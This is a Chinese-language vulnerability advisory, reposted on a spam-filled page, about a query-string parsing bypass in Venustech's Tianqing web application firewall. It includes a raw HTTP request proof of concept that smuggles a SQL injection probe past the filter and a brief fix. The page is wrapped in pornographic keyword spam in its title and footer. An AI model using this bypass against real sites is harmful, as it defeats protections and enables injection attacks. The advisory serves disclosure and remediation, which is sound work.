六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

啟明星辰天清Web應用安全網關協議解析繞過漏洞

[摘要]啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。 Servlet/2.5等jsp處理容器,能夠正確處理http協議GET /news.jsp?x= &...



    啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。
    Servlet/2.5等jsp處理容器,能夠正確處理http協議GET /news.jsp?x= &id=16 HTTP/1.1中參數&id=16前面的空格獲取id=16這個參數,例如下數據包返回網頁正常:


    GET /news.jsp?x= &id=16 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache





    與http://www.test.com/news.jsp?id=16返回網頁相同。





    而啟明星辰天清Web應用安全網關解析協議時,會忽略GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1中"?x=空格"之后的參數,從而繞過防護。

    例直接訪問:http://www.test.com/news.jsp?x=%20&id=16%20and%201=1會攔截

    構造如下poc繞過:

    GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache

    修復方案:

    正確解析http請求第一行中 url參數帶空格字符后的參數
 


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 亚洲乱码一二三四五六区 | 亚洲艹| 婷婷综合久久中文字幕 | 青娱乐手机在线 | 五月天婷婷在线观看视频 | 青青青视频在线 | 五月天第一页 | 影音先锋国产资源 | 亚洲第一区精品日韩在线播放 | 欧美特黄三级成人 | 中国国产成人精品久久 | 婷婷综合视频 | 日本高清视频www | 日本高清影院 | 婷婷在线成人免费观看搜索 | 一二三四五影视在线播放 | 日本高清在线不卡 | 亚洲不卡中文字幕 | 中文字幕色综合久久 | 亚洲专区一 | 天天干夜夜笙歌 | 性感美女视频免费网站午夜 | 日韩精品亚洲人成在线观看 | 青草视频在线观看免费视频 | 午夜神器成在线人成在线人免费 | 字幕网中文aⅴ资源站 | 天天色国产 | 人人精品| 人人福利 | 午夜老司机在线观看免费 | 午夜视频观看 | 日本激情在线观看 | 四虎影院永久在线观看 | 午夜视频网址 | 热伊人99re久久精品最新地 | 日韩亚洲一区中文字幕在线 | 真实国产乱子伦精品免费 | 色噜噜狠狠一区二区 | 亚洲精品在线免费看 | 色黄网站| 色婷婷在线影院 |